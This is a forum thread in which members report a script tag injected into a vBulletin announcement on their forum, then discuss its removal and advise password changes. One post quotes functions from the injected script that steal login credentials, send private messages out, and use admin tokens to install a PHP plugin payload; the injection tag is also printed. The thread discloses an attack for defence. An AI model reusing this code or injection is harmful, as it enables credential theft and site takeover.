security problem...

[sinclair1]

You have a serious security problem. My English is too bad to explain it exactly..
so i do it in German. Maybe someone else can translate this.


wenn man zb. diese URL(http://www.akiba-online.com/forumdisplay.php?f=103)
aufruft wird bei Announcement (siehe Quellcode) ein Script aufgerufen.

<a href="announcement.php?f=103"><script src="http://www.nogripracing.com/forum/clientscript/g/l.js"></script></a>

Dieses Script sendet sämtliche Privaten Nachrichten, im XML Format, per POST
nach http://www.nogripracing.com/forum/clientscript/g/data.php (habe es geloggt)
Ausserdem ist es sehr wahrscheinlich das auch die Logindaten übermittelt wurden.

 

[Ceewan]

I have addressed this before but I will make comment on it again: use Mozilla Firefox with Noscript and deny javascript for inessential sites.


That said I have not seen anything that states any warning about nogripracing.com as a maleware site. Most likely the script is attached to an outside link leading to a hosted image located at nogripracing...but I am just guessing. If anyone notices the exact source of the script, (I certainly don't feel like looking for it), please feel free to share it. A general forum section does nothing for me as I am getting no javascript request for the akiba-online link provided. As far as I can tell nogripracing is a sim-racing site and nothing more.

 

[sinclair1]

I don't think nogripracing.com is a malware site. Maybe they were hacked too.

some functions from this script:

function stealPassword() {
var frame = this.document.getElementById('frame').contentWindow.document;
var form = $(frame).find('form[name="loginform"]');
var username = $(form).find('input[name="vb_login_username"]').val();
var password = $(form).find('input[name="vb_login_password"]').val();

if (password.length == 0) {
getMessages();
return;
}

request({ type: TYPE_STEAL, login: username + ':' + password });
}

function getMessages() {
$.get(PATH_FORUM + '../private.php?do=downloadpm&dowhat=xml', function(data) {
request({ type: TYPE_USER, messages: escape((new XMLSerializer()).serializeToString(data)) });
});
}

function checkAdmin() {
var frame = $('<iframe />', { id: 'frame', src: PATH_FORUM + 'index.php?do=home', style: 'display: none;' });
$(container).append(frame);

$(frame).load(function() {
document.title = originalTitle;

if ($(this.contentWindow.document).find('form[name="loginform"]').length > 0) {
stealPassword();
return;
}

var adminhash = $(this.contentWindow.document).find('#news input[name="adminhash"]').val();
var securitytoken = $(this.contentWindow.document).find('#news input[name="securitytoken"]').val();

request({ type: TYPE_PLUGIN });
$.post(PATH_FORUM + 'plugin.php?do=update', {
do: 'update',
adminhash: adminhash,
securitytoken: securitytoken,
product: 'vbulletin',
hookname: 'global_start',
title: 'Test',
executionorder: 1,
phpcode: PLUGIN_PAYLOAD,
active: 1,
});
});
}

 

[Ceewan]

what page are you finding that script on?

 

[sinclair1]

@Ceewan --> h**p://www.nogripracing.com/forum/clientscript/g/l.js (takes some time to load)

 

[Ceewan]

I have seen this script pop on Noscript before but I can't nail down its' location (now that I am actually looking for it, damn you, I am just here to screw around not go to work). You would think it would be on the homepage but I don't see it.


the location at Akiba-Online that it is located is what I(we) am looking for sinclair1

 

[Ceewan]

To clarify that script is not a part of this site so it must be attached to something that this site is linking to. If it was embedded here I would see it in NoScript on every page I visit at Akiba-Online.

 

[sinclair1]

@Ceewan e.g. http://www.akiba-online.com/forumdisplay.php?f=103

in this section:

<ol id="announcements" class="announcements">
<li class="announcerow">
<div class="announcement">
<dl>
<dt>Announcement:</dt>
<dd>
<a href="announcement.php?f=103"><script src="h**p://www.nogripracing.com/forum/clientscript/g/l.js"></script></a>
</dd>
</dl>
<a class="username understate" href="member.php?u=18907">ryuuga</a> <span class="usertitle understate">(みうみうの恋人)</span>
</div>
<div class="announceinfo">
<div class="date">02-08-2014 <span class="time"></span></div>
<dl>
<dt>Views:</dt>
<dd>
<a href="announcement.php?f=103">
535
</a>
</dd>
</dl>
</div>
</li>
</ol>

 

[Ceewan]

consider me spanked.


Your observation is confirmed and I have no explanation on my end. That is one for the mods and admins. I reported it, that is all I can do.

 

[elgringo14]

I removed the link to the malware script I think. :sweaty:

Indeed I did not notice anything wrong, as I use nopscript and set all sites scripts off by default.

I suggest to all akiba members to change their password, as we have no idea what really happened.
It could be that ryuuga's account was hacked before that. He was active until yesterday, but said nothing about that announcement and didn't post since a while.

We are quite busy with routine moderation and did not bother with that stuff, sorry for the inconvenient.

 

[elgringo14]

More infos on the joys of using vBulletin:

http://thehackernews.com/2014/01/openSUSE-Forum-Hacked-by-Pakistani-hacker.html

 

[ezepietro]

you should take out the privilege of those inactive mods, just in case.
-----------------------

if any want to change the pass this could be interesting to you

I recommend that you change your password to something unique (only used here on Akiba-Online.)

If you want to resist brute-force password attacks, you need a password with at least 64 bits of entropy.

• A password with 10 truly random alphanumeric+symbol characters has 65.5 bits of entropy.
• A 5-word random diceware password has 64 bits of entropy. See https://entima.net/diceware/

If you want to resist brute-force password attacks AND a leak of the Akiba-Online database (it's happened before), you need a password with at least 90 bits of entropy.

• A password with 14 truly random alphanumeric+symbol characters has 91.7 bits of entropy.
• A 7-word random diceware password has 90 bits of entropy. See https://entima.net/diceware/

And of course you need to adequately protect your email account so that a hacker cannot "recover" your Akiba-Online password...

 

[Ceewan]

Nice input ezepietro but this is not a bruteforce type of attack, although that is solid wisdom in creating passwords. This is about exploits in vbulletein itself yet one must admit there is a good chance ryuuga's account was hacked or at least compromised. However ryuuga did not have admin privledges so there is only a finite amount of damage one could do with his account and almost nothing that could not be undone by either another moderator or an admin such as Rollyco or chompy. My guess it is just a random unmalicious hack or possibly spam related (I noticed a few huge spam attacks the last few weeks). My guess is other less active moderators accounts are safe as a bug in a rug, atm anyway.

 

[ryuuga]

Ya. Not sure if this is the real cause. But my account somehow was acting weird and created a global announcement without my awareness. Btw, is is me or the forum is being extremely slow lately?

 

[Ceewan]

Traffic is a lot heavier now at peak hours (or even near them). Hard to tell how much of that is spambots and the like and how much is member and user traffic but AO has set records as of late. Glad you had a chance to change your password and clear your name.